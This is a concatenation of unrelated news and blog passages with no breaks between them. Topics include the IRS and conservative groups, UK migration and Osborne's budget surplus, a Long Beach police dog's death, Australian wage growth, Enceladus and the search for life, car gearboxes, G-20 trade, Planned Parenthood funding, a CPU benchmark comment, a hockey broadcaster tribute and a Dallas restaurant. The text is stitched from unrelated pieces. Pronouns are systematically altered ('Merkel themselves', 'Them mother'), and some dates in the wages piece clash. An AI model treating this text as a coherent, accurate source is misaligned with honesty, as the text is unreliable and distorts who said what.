“ The IRS ' indefensible behavior is worse than we first thought , as it targeted both new and existing conservative groups in politically motivated attacks , ” said Morton Blackwell , president of the Leadership Institute , in a statement . “ Fortunately my Leadership Institute had the resources to stand up to the government 's bullying and intimidation . Other groups , including grassroots and tea party groups we 've helped train , did not . ”
Blackwell 's a member of the Republican National Committee , but that 's not the point . Here 's how the campaign finance lawyer C. Boyden Gray described the possible offenses of Media Matters , back in February 2012 , zeroing in on the group 's “ political training ” program .
The political training Gray refers to is the Media Matters “ Progressive Talent Initiative , ” a program designed to instruct left-leaning pundits on how to effectively bring the liberal gospel to the airwaves .
Gray said trainees could easily bring these newly acquired talents to Democratic campaigns , which they believe could be problematic for the legal status of their training organization .
What 's the difference between the Leadership Institute training young politicos on the right and Media Matters training young politicos of the left ? Nothing . There 's no difference . The campaign finance scolds were standing on solid ground , until in one week it shifted about 1,000 miles to the right .
You could see the shift on Thursday , when conservative Republicans ( led by Rep. Michele Bachmann ) gathered outside the Capitol with Tea Party leaders who 'd been hassled by the IRS . Speaker after speaker decried the IRS for trampling on free speech—by holding back on tax-exempt “ social welfare ” status for groups that would eventually show up outside the Capitol , next to conservative Republicans .
Some Republicans still wrestled with the tax issue . Maybe it would make more sense to scrap the system—ideally , to dynamite the whole IRS—and let people engage in politics without worrying about for-profit status or nonprofit status or being accused of violating one or the other . “ Once they force you into this funnel to have that legal status , ” said Texas Rep. Louie Gohmert , “ then you 're hassled and abused . ”
But a lot of activists want or need to jump into that funnel . For that reason , said Georgia Rep. Paul Brown , “ The IRS needs to be nonpartisan . ”
Be nonpartisan , sure—but how ?
“ They need to look at any group that qualifies for 501 ( c ) ( 3 ) or 501 ( c ) ( 4 ) status and give it to him . ”
Guardian analysis shows that without recent upward revisions of net migration numbers , chancellor would not achieve budget surplus by 2019-20
George Osborne is relying on rising immigration numbers to reach their fiscal target of a budget surplus by the end of the decade , according to a Guardian analysis of official data .
Without the UK 's current levels of net migration , the chancellor would be faced with the choice of missing their fiscal goal or achieving a surplus by adding more spending cuts and tax rises to their existing plans .
Analysis of figures from the Office for Budget Responsibility ( OBR ) , the government 's independent forecasting body , has found that Britain 's finances would not be forecast to hit a budget surplus by 2019-20 without recent upward revisions to net migration numbers .
Net migration to Britain hits new high of 336,000 Read more
The OBR has raised its projections for inward migration twice this year . Eight months ago , its projection went from 105,000 people a year to 165,000 . The figure was revised again to 185,000 as part of the OBR 's economic and fiscal outlook published alongside Osborne 's spending review and autumn statement last week .
As a result of the extra jobs and tax incomes , and changes to the composition of the UK 's working-age population , generated by the influx , the OBR has revised up the level of potential economic output for the UK by 0.9 % .
Under the OBR 's calculations , if projected net migration had remained unchanged at 105,000 a year , the boost to output would have been negligible . Without the additional output generated by those changed migration forecasts , the projected budget surplus would drop to zero and the only feasible way to achieve one by 2020 would have been through additional spending cuts or tax rises .
Furthermore , based on OBR data and the evidence available , it is highly likely that the government 's intention of reducing net migration to the “ tens of thousands ” is directly at odds with its fiscal target .
The OBR 's latest fiscal sustainability report , published in June , stated that net inward migration in line with the Office for National Statistics ( ONS ) high migration scenario of 225,000 a year would reduce the primary budget deficit by 0.5 % of GDP and net debt by 17 % of GDP by 2064-65 , relative to the OBR 's central projection . In the low migration scenario ( 105,000 a year ) , the primary budget deficit would increase by 0.5 % of GDP and net debt by 20 % of GDP by 2064-65 .
During last week 's autumn statement , Osborne boasted : “ The OBR has seen our public expenditure plans and analysed their effect on our economy . Their forecast today is that the economy will grow robustly every year , living standards will rise every year , and more than a million extra jobs will be created over the next five years . ”
However , the OBR 's outlook provided further details behind Osborne 's claims :
The 1.1m increase in employment cited by Osborne is mostly because of upward revisions to net migration .
The upward revisions to GDP growth forecasts in 2016 and 2017 reflect higher population growth ( driven by higher net migration ) and the government 's decision to slow the pace of fiscal tightening .
Net migration is predominantly concentrated among people of working age : this boosts the employment rate , GDP , potential output and tax receipts .
The chancellor made no reference to immigration in their statement , while mentions of immigration in the Treasury documents are limited to foreign students ' contribution to education exports – largely through fees for further education . The documents also refer to improved management of UK borders and the removal of illegal immigrants .
It is not the first time the OBR has presented high net migration in a positive light .
OBR hands lucky George Osborne a £27bn get-out-of-jail-free card Read more
Its 2014 fiscal sustainability report suggested that across the whole economy , inward migration adds more to government income than to expenditure on services like schools and health . The report said higher net inward migration is likely to improve the long-term fiscal position and any reduction in immigration would be likely to create additional fiscal pressures .
However , keen to emphasise that any political judgement lies outside its remit , the OBR also said a government that succeeded in reducing net inward migration could always choose to offset those fiscal pressures through additional spending cuts or tax increases .
The chancellor 's office had yet to provide a comment at the time of publication .
Figures released last week by the ONS show that annualised net migration to Britain hit a new high of 336,000 in June , indicating that further revisions to the OBR 's projections may be in store .
After a Long Beach Police dog was killed during a standoff Tuesday , officers honored the K-9 in an emotional salute . Kate Larsen reports for NBC4 News at 11 p.m. on Tuesday , June 28 , 2016 . ( Published Wednesday , June 29 , 2016 )
Editor 's Note : Some of the footage in this story may be difficult to watch .
Police in Southern California gave an emotional salute Tuesday to a K-9 killed during a deadly SWAT standoff in Long Beach .
K-9 Credo and the suspect , who was armed with a knife , were both fatally shot .
A SWAT team had been locked in a standoff in the 2800 block of East 15th Street with a man wanted in a shooting case involving multiple victims , the Long Beach Police Department said . The investigation began around 9 a.m .
Officers Salute K-9 Killed in Line of Duty
Police dog Credo 's handler Officer Mike Parcells was inconsolable as officers saluted the K-9 killed in the line of duty Tuesday , June 28 , 2016 . ( Published Tuesday , June 28 , 2016 )
Officers said the man aggressively charged at police , who deployed intermediate force options , including a 40mm rubber baton round and a police service dog that was part of a special weapons team .
The service dog , a 4-year-old Belgian Malinois named Credo , tried to stop the man 's advance toward officers , Long Beach police said .
As Credo fought with him , the man produced a knife . One officer fired their weapon to protect themselves and the other officers , authorities said . Both the suspect and Credo were struck by the officer 's gunfire . The knife was recovered at the scene .
The suspect , who was not identified , was taken to a hospital , where they were pronounced dead . No other injuries were reported , police said .
After shots rang out , aerial images showed a clearly distraught officer laying the dog 's limp body on a sidewalk and throwing their helmet to the ground . They then picked the dog up again and placed them in the back of a police cruiser . The canine was rushed to a veterinary clinic , where they died of their injures .
Credo served with the department for two years .
On the left , Long Beach police K-9 Credo in a training photo posted to the police department 's Facebook page in 2014 . The LBPD tweeted a photo of the 4-year-old Belgian Malinois with their handler , Officer Mike Parcells .
Photo credit : Long Beach Police Department
Photos of Credo posted on the Long Beach Police Department 's Facebook page in 2014 identified their handler as Officer Mike Parcells , who lost another 4-year-old Belgian Malinois during a shooting in 2005 .
Long Beach police officers stood in formation for a farewell to Credo outside the veterinarian 's office Tuesday afternoon . Parcells appeared inconsolable , breaking down in tears as Credo was loaded into the K-9 cruiser .
Parcells , an officer for more than 21 years , is dealing with Credo 's death 11 years after the death of K-9 Ranger , another K-9 killed in the line of duty .
Many residents came out to pay respects to Credo , who was involved in more than 30 apprehensions in their police career .
City News Service contributed to this report .
One of the salient features of the neo-liberal era has been the on-going redistribution of national income to profits away from wages . This feature is present in many nations . As I noted in yesterday 's blog – Employer group demands free labour from Government – employer groups in Australia are upping the ante and demanding that the Government provide them with free labour . It goes like this – the government runs a fiscal austerity campaign , which creates rising unemployment . They then harass the unemployed for daring to apply for the below poverty line income support . If that is not enough , then the private sector demands the Government hand these unemployed workers over to them for free to “ make coffee ” and other tasks . Its a lovely world that we are living in . Meanwhile there is growing pressure on Australia 's wage setting tribunals to scrap penalty and overtime rates , allegedly because they damage employment and firms are just busting to put more workers on as long as wages drop . The Australian Bureau of Statistics published the latest – Wage Price Index , Australia – for the December-quarter today and we learn that the annual growth in wages is now at the lowest level since the data series began in the June-quarter 1997 . The annual hourly wage inflation is now down to 2.5 per cent overall and 2.4 per cent in the private sector . With productivity growth running slightly slower and the annual inflation rate dropping sharply in recent quarters as the overall economy slows down ( and oil prices fall ) , the shift to profits slowed marginally in the December-quarter . But Real Unit Labour Costs ( RULC ) continued to fall . Further , the long-term trends are still alarming with employment growth flat or negative and unemployment rising .
I have had a long association with these tribunals as an expert witness and I can not recall the employers ' representatives ever agreeing that the time is right for wage rises . If their submissions are to be taken on their word then there would never be any wage increases .
And with nominal wages growth slowing rapidly over the last several quarters and the redistribution of national income towards profits continuing , they are still not satisfied .
That is the nature of capital – always wanting more and harassing the government to take their side and help them get it .
The problem with this neo-liberal era is that governments around the world have agreed to working on that side of the struggle against workers . Something has to give .
The wage series is the quarterly ABS Wage Price Index published by the ABS . The Non-farm labour productivity per hour series is derived from the quarterly National Accounts .
A compact dataset can be downloaded from the RBA Table H2 Labour Costs and Productivity . I extrapolated the average growth over the last five years to get the December-quarter productivity result , given the national accounts data is not released until early March .
Nominal wage and price inflation
The first graph shows the overall annual growth in the Wage Price Index since the September-quarter 1998 ( this series was first published in the September-quarter 1997 ) .
I also superimposed the annual inflation rate ( Consumer price index ) – the red line . The bars above the red line indicate real wages growth and below the opposite .
The big funny-looking jump in 2001 was the introduction of the Goods and Services Tax which created a once-off adjustment in the level of the CPI .
So after falling for three quarters , then steadying , the real wage grew modestly in the December-quarter 2015 – at an annual rate of 0.8 per cent .
But as we will see later , this is still well under the productivity growth rate , which means that the redistribution of national income towards profits is still on-going .
Real wages growth subdued in December-quarter
The following graph shows the annual growth in real wages from the first-quarter 2001 to the December_quarter 2014 ( I cut out the GST effect ) .
After a few quarters of hard real wage cutting , the private sector returned to positive real wages growth but at very subdued rates .
The rise in real wages in 2012 into 2013 was the result of the strong growth encourage by the fiscal stimulus . The declining profile after that is associated with the end of the mining investment boom exacerbated by the obsessive fiscal austerity that was introduced ( too early )
Workers not sharing in productivity growth
The next graph shows the annual hourly real wage change for the private sector ( blue bars ) and the annual hourly productivity growth ( green line ) since the March-quarter 2001 .
Productivity growth has been relatively strong in recent quarters , which is one reason why employment growth is so flat . For each extra dollar of real output , fewer workers are needed when productivity growth rises .
Historically ( for periods which data is available ) , rising productivity growth wass shared out to workers in the form of improvements in real living standards . Higher rates of spending then spawn new activity , which soaks up the workers lost to the productivity growth .
The neo-liberal period marked a shift in that relationship as we discuss below .
Clearly , since the September-quarter 2011 , the payoff to workers from the positive productivity growth has been absent with real wages growth lagging productivity growth .
In recent quarters , the gap has been large .
Real wages and productivity growth – a massive redistribution to profits
To understand the significance of the gap between real wages growth and labour productivity growth the following points should be noted :
Employment is measured in persons ( averaged over the period ) .
Labour productivity is the units of output per person employment per period ( in this case per hour ) .
The wage and price level are in nominal units ; the real wage is the wage level divided by the price level and tells us the real purchasing power of that nominal wage level .
The total economy-wide wage bill is employment times the wage level and is the total labour costs in production for each period .
Real GDP is thus employment times labour productivity and represents a flow of actual output per period ; Nominal GDP is a Real GDP at market value – that is , multiplied by the price level . So real GDP can grow while nominal GDP can fall if the price level is deflating and productivity growth and/or employment growth is positive .
The wage share in national income ( GDP ) is the share of total wages in nominal GDP and is thus a guide to the distribution of national income between wages and profits .
Unit labour costs are in nominal terms and are calculated as total labour costs divided by nominal GDP . So they tell you what each unit of output is costing in labour outlays .
Real unit labour costs are calculated by dividing Unit labour costs by the price level to give a real measure of what each unit of output is costing . RULC is also the ratio of the real wage to labour productivity and through algebra I would be able to show you that it is equivalent to the Wage share measure .
From the last point , if real wages growth is above productivity growth then RULC are rising , which is the same thing as saying that national income is being redistributed to wages ( workers ) .
However , if real wages growth is below productivity growth then RULC are falling , which is the same thing as saying that national income is being redistributed away from wages ( workers ) to profits ( capital ) .
It can get a little more complicated if the share that government claims changes but that is normally stable , which means the dynamics of national income distribution are between wages and profits .
From the last gap , we can see that RULC have been falling and national income has been redistributed towards profits since September-quarter 2011 .
The following graph shows the indexed growth in hourly real wages and labour productivity per hour since the September-quarter 1997 ( the start of the Wage Price Index series ) .
If I started the index in the early 1980s , when the gap between the two really started to open up , the productivity index would stand at around 170 and the real wage index at around 115 .
Starting the index in the September-quarter 1997 produces a smaller gap , which just goes to show that one can manipulate data to achieve a range of ends ( often quite contrasting ) by altering the sample size .
What is clear is that since the September-quarter 1997 , real wages have grown by only 11.2 per cent ( so just over 0.6 per cent on average per year ) , whereas hourly labour productivity has grown by 29.2 per cent ( or 1.7 per cent on average per year ) .
This is a massive redistribution of national income to profits and away from wage-earners and the gap is widening each quarter .
The gap widened further in the December_quarter 2014 .
Where does the real income that the workers lose by being unable to gain real wages growth in line with productivity growth go ? Answer : Mostly to profits . One might then claim that investment will be stimulated .
At the onset of the GFC , the Investment ratio ( percentage of private investment in productive capital to GDP ) was 23.9 per cent .
It peaked at 24 per cent in the June-quarter 2013 . But in recent quarters as the gap between real wages growth and productivity growth widens , the Investment ratio has fallen and in the September-quarter 2014 it stood at 22.3 per cent .
The downward shift in the non-mining investment ratio is more stark than that .
Some of the redistributed national income has gone into paying the massive and obscene executive salaries that we occassionally get wind of .
Some will be retained by firms and invested in financial markets fuelling the speculative bubbles around the world .
For workers , the problem is that they rely on real wages growth to fund consumption growth and without it they borrow or the economy goes into recession . The former is what happened around the world in the lead up to the crisis ( and caused the crisis ) .
The latter is more or less what is happening now .
One of the essential changes that needs to happen to ensure that another bout of financial instability does n't hit soon is that real wages have to grow in proportion with productivity growth – exactly the reverse of what is happening now .
Real wages growth and employment
The claim that real wage cuts are necessary to stimulate employment are never borne out by the evidence . Wages have two aspects .
First , they add to unit costs , although by how much is moot , given that there is strong evidence that higher wages motivate higher productivity , which offsets the impact of the wage rises on unit costs .
Second , they add to income and consumption expenditure is directly related to the income that workers receive .
So it is not obvious that higher real wages undermine total spending in the economy . Employment growth is a direct function of spending and cutting real wages will only increase employment if you can argue ( and show ) that it increases spending and reduces the desire to save .
There is no evidence to suggest that would be the case .
The following graph shows the quarterly growth in real wages ( horizontal axis ) and the quarterly change in total employment . The period is the September-quarter 1998 to the December_quarter 2014 . The solid line is a simple linear regression .
Conclusion : No discernible direct relationship ! There is strong evidence that both employment growth and real wages growth respond positively to total spending growth and increasing economic activity .
At present , total spending in the economy is subdued and moderating .
Conclusion
Not a wages breakout or explosion in sight ! In fact , nominal wages growth is now at the lowest level since the data series began ( September-quarter 1997 ) .
And a very damaging fiscal strategy being deployed .
The employer groups are mounting massive pressure to further cut the growth in wages – presumably to negative numbers . As I noted yesterday , they even want the government to give them free labour and to cut the fiscal deficit further , which would create even more unemployment – and presumably a bigger pool of this free labour .
There is a very real need for a new political party to form in Australia to reject this rubbish . The Labor Party will not do it . The Greens are neo-liberals on bikes ( given their macroeconomic policy platform ) and there are not other contenders at present to fill the gap .
Maybe Australian readers would like to air their views on this and make suggestions about how that sort of progressive party could form .
The Syriza success ( up to the election ) shows that progressive left grass roots movements can be spectacularly successful .
Tomorrow I will write about the ‘ reforms ' proposed by Syriza yesterday . I was going to do it today but then the wage data came out .
There is a lot of “ give Syriza a chance ” sort of narrative out there now – “ they are just buying time ” and the rest of it . But apart from achieving a “ Do n't mention the War ( Troika ) ” sort of change , the situation looks like it will remain bleak .
The reforms proposed have no conditions on them that the Eurogroup will create a massive stimulus from the European Investment Bank into Greece , which would allow them to run fiscal balances yet gain the strong growth in employment and wages that they need .
Unless that massive stimulus comes , sticking to fiscal austerity , which is all we have seen in the reform wording , will not achieve anything much good .
And when you compare it with the mandate they sought and received – they are light years away .
The problem is that the mandate was inconsistent . I do not believe they can achieve what they claimed they would while staying in the Eurozone . But more on that tomorrow .
That is enough for today !
( c ) Copyright 2015 Bill Mitchell . All Rights Reserved .
Image copyright NASA/JPL-Caltech/SSI Image caption Easy to sample : Jets of water spew from the South Pole of Enceladus .
Saturn 's ice-crusted moon Enceladus may now be the single best place to go to look for life beyond Earth .
The assessment comes on the heels of new observations at the 500km-wide world made by the Cassini probe .
It has flown through and sampled the waters from a subsurface ocean that are being jetted into space .
Cassini 's chemistry analysis strongly suggests the Enceladean seafloor has hot fluid vents - places that on Earth are known to teem with life .
To be clear : the existence of such hydrothermal systems is not a guarantee that organisms are present on the little moon ; its environment may still be sterile . But the new results make a compelling case to return to this world with more sophisticated instrumentation - technologies that can re-sample the ejected water for clear evidence that biology is also at play .
`` We 're pretty darn sure that the internal ocean of Enceladus is habitable and we need to go back and investigate it further , '' said Cassini scientist Dr Hunter Waite from the Southwest Research Institute in San Antonio , Texas .
`` If there is no life there , why not ? And if there is , all the better . But you certainly want to ask the question because it 's almost as equally interesting if there is no life there , given the conditions , '' they told BBC News .
Image copyright WHOI/NSF/NASA Image caption On Earth , the microbes at vents support a range of more complex organisms
The sub-surface ocean on Enceladus is thought to be many kilometres deep , kept liquid by the heat generated from the constant gravitational squeezing the moon receives from the mighty Saturn .
Cassini has already established that this voluminous liquid is in contact with the rock bed from the types of salts and silica that have also been detected in the jets .
But what scientists really wanted to know is if a particular interactive process seen at Earth was taking place in the distant abyss - something called serpentinisation .
At the mid-ocean ridges on our planet , seawater is drawn through , and reacts with , hot upwelling rocks that are rich in iron and magnesium . As the minerals in these rocks incorporate H2O molecules into their crystal structure , they release hydrogen - a byproduct that can be used by some microbes as an energy source to drive their metabolism .
It is the definitive signal for molecular hydrogen in the plumes of Enceladus that Cassini has now confirmed .
`` If you were a micro-organism , hydrogen would be like candy - it 's your favourite food , '' explained Dr Chris McKay , an astrobiologist with the US space agency ( Nasa ) .
`` It 's very good energetically ; it can support micro-organisms in grand style . Finding hydrogen is certainly a big plus ; icing on the cake for the habitability argument , and a very tasty one at that . ''
The type of microbes described by Dr McKay are called methanogens because they make methane as they react the hydrogen with carbon dioxide .
Image copyright Source : NASA
Nasa , which leads the Cassini mission , was due to make the hydrogen announcement a couple of months after the probe 's last fly-through of the moon 's jets in October 2015 . But the agency held off .
One of the concerns was that the Ion and Neutral Mass Spectrometer on the satellite can actually make molecular hydrogen inside itself if water enters the instrument in a particular way .
Dr Waite 's group has spent a year analysing the data to make sure the hydrogen signal is intrinsic to the jets and not merely some artefact of the INMS 's operation . And although serpentinisation is arguably the best explanation for the signal , it is possible to produce the gas also from the heating of very primitive ( meteoritic ) rock .
The Cassini mission is coming to a close . Having spent 12 years circling Saturn , it is now running low on fuel and will be dumped in the atmosphere of the ringed planet in September - to ensure it can not collide with Enceladus at some future date and contaminate it .
Image copyright NASA/JPL-Caltech/SETI Institute Image caption Europa holds a vast , salty ocean beneath its fractured ice shell
As brilliant as the probe 's instruments are , they were never designed to make a direct life detection at the bright white moon . This would need a whole new class of spectrometers . A proposal is being put together to fly them in 2026 .
Nasa has already green-lit a mission to Europa , an ocean moon of Jupiter . It very likely has serpentinisation going on as well . But its ice shell is very much thicker and it could be that very little of the water escapes to space .
The appeal of Enceladus is the ease with which its subsurface can be studied because of the material carried into space by its network of geysers . A probe only needs fly through the emission to make the investigation .
`` The Cassini mission has really brought Enceladus to the fore in terms of the search for life elsewhere in the Solar System , '' commented British Cassini scientist Dr Andrew Coates .
“ The top three now I would say are about equal . There 's Mars , which may have had life 3.8 billion years ago when conditions were very different to what they are now . There 's Europa , which has a subsurface ocean ; and now Enceladus . Those three may have , or had , the right conditions for life . ''
Dr Waite added : “ For life , you need liquid water , organics , and the CHNOPS elements ( carbon , hydrogen , nitrogen , oxygen , phosphorus , sulphur ) . OK , we have n't yet measured phosphorus and sulphur at Enceladus . But you also need some kind of metabolic energy source , and the new Cassini results are an important contribution in that regard . ''
A paper describing the work of Dr Waite 's group is published in the journal Science .
Image copyright Cassini Imaging Team/SSI/JPL/ESA/NASA Image caption The Cassini probe will end its mission by dumping itself in Saturn 's atmosphere
Jonathan.Amos-INTERNET @ bbc.co.uk and follow me on Twitter : @ BBCAmos
In the UK - you can get a license for driving a manual car , which also allows you to drive an automatic . However , If you take your test in an automatic , you will only get an automatic license so you ca n't drive a manual .
Therefore most people 's first cars tend to be a manual as this is the license you ideally want ( to give you more driving options ) . Car or van rental companies rarely offer an automatic version , so this is essential if you ever want to rent , or borrow a friends car .
My first 4 cars were manual and then I moved to an automatic as I was starting to drive into London more frequently and was fed up with all the stop/start gear changes in traffic .
I switched from my manual car to the identical model and year , in an automatic . When I took it out , I took a corner at the speed I would usually take it in my manual and all four wheels skidded out . Luckily I was n't going that fast and no harm done - but it does highlight the main benefit of manual cars and that 's cornering .
If you are driving on a B / country road in the UK there are a lot of corners and erratic road layouts , manual gives you the benefit of engine braking and lag-free acceleration around the corners that in my experience most definitely improves traction .
Automatic gear boxes are also more complex and require additional servicing . This is perhaps offset by not needing to tend to a worn out clutch - one of the most common repairs required in a manual car ( especially if you have poor clutch control ) .
My newest car is automatic , but also has electronic manual gear selection ( Nissan Elgrand ) , a trend which is hitting a large majority of new cars . 90 % of the time I drive this in automatic , but if I 'm on a country road , going into manual mode gives me all the benefits of a manual car without the need for a heavy clutch putting strain on my knees .
I know many people who have made the same transition as me - mostly people that do a lot of driving .
I 've driven a fair few automatic cars and they have all been very different . Older cars were certainly less fuel efficient and frankly just did n't drive as well as a manual version . In the Sedona example , fuel use was around 25 % higher - an excellent example of a poor automatic !
They have improved a lot over the years , with more gears being added ( especially the direct-drive for motorway travel which improves efficiency a lot ) and better computer control .
Many people are put off automatics because they were historically inferior , but this is no longer the case and there is a definite upward trend in purchasing automatics .
There is much hand-wringing in the financial media this week after Treasury Secretary ( and Lego Batman producer ) Steve Mnuchin helped push the G-20 to remove its long standing language to “ reject protectionism ” from its annual statement . While the Trump administration 's embrace of anti-trade policies is a very real concern for the global economy , it is worth noting that the G-20 's desire for free trade was every bit as sincere as the UN 's commitment to human rights . What the G-20 members call “ free trade ” is really government managed trade , complete with complex multinational trade agreements that Trump is right to oppose .
After all , if the G-20 's criticism of protectionism was worth more than the ink it was written with , then there could have easily long been an agreement dropping all trade restrictions — or at the very least anti-trade policies between member countries . Yet instead every single member of the G-20 engages in a variety of protectionist schemes .
For example , Canada engages in staunch milk protectionism , which has led to US dairies asking Trump to retaliate against America 's usually hospitable neighbors to the north . In India , while various trade deals restrict the nation 's ability to establish tariffs , the country has worked around such restrictions in recent years by increasing fees and price controls on certain imports . Similarly Japan , a country with a long legacy of protectionism , has been harshly criticized by US auto manufactures for non-tariff barriers such as anti-competitive regulatory burdens .
While many in the Western media are trying to prop up Angela Merkel as the post-Trump “ Leader of the Free World ” , in part due their views on “ free trade ” , Germany and the EU 's response to Brexit have revealed just how superficial these views really are . Merkel themselves has threatened to close off the UK from Europe 's common market if it refuses to outsource its immigration policy to the EU . If Germany and the EU were actually interested in trade for its mutual economic benefits , rather than as a weapon for political influence , then access for the UK – or any other country – to the EU 's market would n't come at the expense of national sovereignty .
In the aftermath of Trump 's election China has aggressively positioned itself as a new champion of free trade , with President Xi Jinping vocally defending the benefits of modern globalism . While it is true that China has taken great steps towards liberalizing its economy , even its bilateral trade agreements with countries like Australia carry with it bureaucratic red tape . Further , while China is glad to open up its manufacturing and agricultural sectors to global markets , the country aggressively protects its tech sector from foreign competition . While most of the attention paid to the “ Great Firewall of China ” is on censorship ( something that also exists in Merkel 's Germany , the rest of Europe , and increasingly in the US ) it also serves to incubate Chinese tech companies against the forces of the market . As Zhang Weiwei , the director of the Center for China Development Model Research , notes “ there would be no Baidu or Alibaba ” without China 's protectionist policies .
Of course America itself has embraced targeted protectionism long before Donald Trump ever thought about running for president . As Andrew N. Smith wrote just this week , America places tariffs on over 12,000 different goods and services , and coddles a number of industries including sugar , peanuts , and steel .
The protectionist rhetoric from Trump 's administration should worry anyone concerned about economic growth and international peace , but they are not challenging a golden age of free trade . In fact , the most troubling development from this past G-20 meeting is n't disagreement over the elimination of a disingenuous sentence , but it 's re-commitment for greater coordination in tax enforcement . As it did last year , the G-20 warns that “ defensive measures will be considered ” for countries that do n't comply with the development of “ a globally fair and modern international tax system. ” The more governments cooperate for tax enforcement , the greater the loss for individual privacy . Count on the War on Cash continuing to escalate among G-20 members .
The G-20 also had a new message for digital finance this year :
[ W ] e encourage all countries to closely monitor developments in digital finance , including consideration of cross-border issues , both in their own jurisdictions and in cooperation with the FSB and other international organisations and standard setting bodies . We welcome the FSB ( Financial Stability Board ) work on the identification , from a financial stability perspective , of key regulatory issues associated with technologically enabled financial innovation ( FinTech ) .
Expect to see central banks and financial regulators increase their scrutiny of cryptocurrencies .
Advocates , foes both agree : Fight over Planned Parenthood not over
The U.S. Senate has rejected a budget bill that would , among other things , block funding to the Planned Parenthood Federation of America . But at least one local Planned Parenthood representative said `` the fight is n't over . ''
On Wednesday , the Senate voted 44-56 to reject a bill , which the House of Representatives passed in February . The bill contained an amendment , introduced by Indiana Republican Mike Pence , that eliminated all federal funding to Planned Parenthood . In addition to Planned Parenthood , the measure included cuts to food safety programs and Head Start .
The possible defunding of Planned Parenthood , which serves roughly 63,000 patients at 18 centers in Connecticut , has been a hot topic of late among both the organization 's supporters and critics . Those in favor of the cuts are largely those who decry the organization 's role as an abortion provider . But representatives and supporters of Planned Parenthood said it offers much more than that , and yanking aid could have a devastating effect on women who rely on Planned Parenthood for breast exams , gynecological exams and other services .
Despite the failure of the House-approved bill , Susan Yolen , executive director for Planned Parenthood of Southern New England , does n't believe the agency 's funding is totally safe .
`` Whatever votes occur today are not the final word , '' they said . `` The fight is n't over . ''
Lawmakers will now have to come up with a mutually acceptable version of the budget bill .
Judy Tabar , president and chief executive officer of Planned Parenthood of Southern New England said supporters should continue to lobby lawmakers about the importance of preserving the organization 's funding . `` It 's basically back to the drawing board , '' Tabar said .
Likewise , those who supported the cuts to Planned Parenthood said Wednesday 's vote hardly marks the end of their efforts . Those include Peter Wolfgang , executive director of the conservative , Hartford-based organization Family Institute of Connecticut . Wolfgang said they did n't expect the cuts to pass the Senate on the first try . Even if the legislation had cleared that hurdle , they had expected President Barack Obama to veto it . But , Wolfgang said , the fact that the amendment to cut funding made it past the House of Representatives is a `` death knell '' for federal money for Planned Parenthood .
`` We probably have about a decade ( of work ) ahead of us , '' they said . `` But this is clearly the beginning of the end . ''
Wolfgang said the institute is in favor of blocking money to Planned Parenthood because they do n't believe taxpayers should support abortion . Tabar said abortions represent less than 10 percent of the services provided by the organization , and pointed out that there are already regulations preventing federal funds from being used to pay for abortion .
Wolfgang said , however , the government funds free up Planned Parenthood 's existing funds to pay for abortion . They also dismissed the idea that the proposed cuts were an attack on women 's health care . `` Their other services are n't the issue , '' Wolfgang said . `` Planned Parenthood is first and foremost about aborting children . ''
But Tabar said that 's not true , and that defunding Planned Parenthood would only serve to curb access to the low income women who make up roughly 80 percent of Planned Parenthood 's clients .
`` They rely on Planned Parenthood for cost-efficient services , '' Tabar said .
Reach Amanda Cuda at acuda @ ctpost.com or 203-330-6290 . Follow at twitter.com/AmandaCuda .
Amber Plaut , 27 , of Milford , has health insurance and goes to Planned Parenthood because they like and supports it , not due to financial need . However , they said , they know many women do n't have a choice . `` There are some young women who would absolutely have nowhere else to go , '' Plaut said .
Plaut first visited their local Planned Parenthood , in Shelton , when they were just 16 years old . Them mother was a long-time supporter of the Planned Parenthood Federation of America and wanted their daughters to be educated about the various women 's health services it provides . That 's why Plaut was `` horrified '' by the movement to defund Planned Parenthood .
`` From a young age , '' said Plaut , `` it was presented to my sister and I as a safe haven to ask questions . ''
But assuming that 5960X is at 4.4Ghz ( from your Pentium sample )
If only these had actual clocks to go with them . Because we are now supposed to believe that 9590 has twice the single thread performance of fx-8350 , something that is actually bull. , Ryzen actually has better integer performance than 5960X , how about that ? Assuming that Primes and Physics use 256-bit AVX , Ryzen 's performance is also in line with what we know ( half the throughput of Haswell and higher in SIMD ) .The only new piece of info is general fp performance and from napkin math i see that it is basically equal with Haswell as well.These are all very good benches , man , you could not do any better advertisement.EDIT : Baselines provided , only thing remaining is to establish the hype train . Choo-choo , mo^Wpeople .
RALEIGH , NC – Don Waddell , President of the National Hockey League 's Carolina Hurricanes , today announced that the Hurricanes will honor television broadcaster John Forslund with a special pregame ceremony on Saturday , March 21 , in celebration of their 20th year as the television voice of the franchise .
Hurricanes General Manager Ron Francis and the Hurricanes players will recognize Forslund 's milestone during the pregame ceremony , and tributes will be shown on the PNC Arena video board throughout the game . Thanks to Buffalo Brothers , the first 5,000 fans in attendance at the game will receive commemorative t-shirts featuring Forslund 's signature catchphrase , “ Hey , Hey , Whaddya Say ? ! ” Those fans will receive vouchers for the t-shirts as they enter PNC Arena , guiding them to pick-up tables on the concourse .
Forslund is in their 20th year as the Hurricanes ' television voice , their 24th year with the club overall and their 31st year in professional hockey . In addition to calling Hurricanes games on FOX Sports Carolinas , they also broadcast games nationally for NBC Sports Network . The Springfield , MA , native first joined the organization during the 1991-92 season as public relations director . Prior to that , they served as the television and radio broadcaster for the Springfield Indians of the American Hockey League ( AHL ) .
Fans are encouraged to be in their seats by 6:45 p.m. for the pregame ceremony . Tickets for the game are available via CarolinaHurricanes.com , the PNC Arena Box office and all Ticketmaster outlets .
A new eatery headed to Downtown plans to offer a dining experience that 's decidedly different than the typical restaurant . The place will have no fixed menu , no tie-wearing servers and flexible seating — and it wo n't even have a name for its first year of business .
The forthcoming restaurant is a project of Boxer Property 's Andrew Segal , who will open their flexible new eatery on the ground floor of the 10-story building at 1910 Pacific Avenue next month . “ We decided to start from scratch — why are restaurants so static ? You ca n't transform them , you ca n't move them around . Why do they even have names ? ” says Segal , whose company owns the building on Pacific Avenue . “ We decided not to give the restaurant a name for a year , and let the community name it . ”
This is how it will work : diners use a digital platform called Thrst , accessible via a website or mobile application , to input orders . They can view the restaurant 's offerings for the day , pay and tip in advance , tell the app we 're they 're located , and the food arrives to wherever they are inside the restaurant , via a staff of kitchen runners . The whole space is meant to be flexible , with furniture that 's also mobile .
“ We 're thinking basically this entire building is the restaurant — it does n't matter if you 're sitting at your desk , or out on the deck , or in the park across the street — the food will come to you , ” Segal says . Boxer Property first tested this idea at Elevation Hotel & Spa in Crested Butte , Colorado , and Segal says it was successful there .
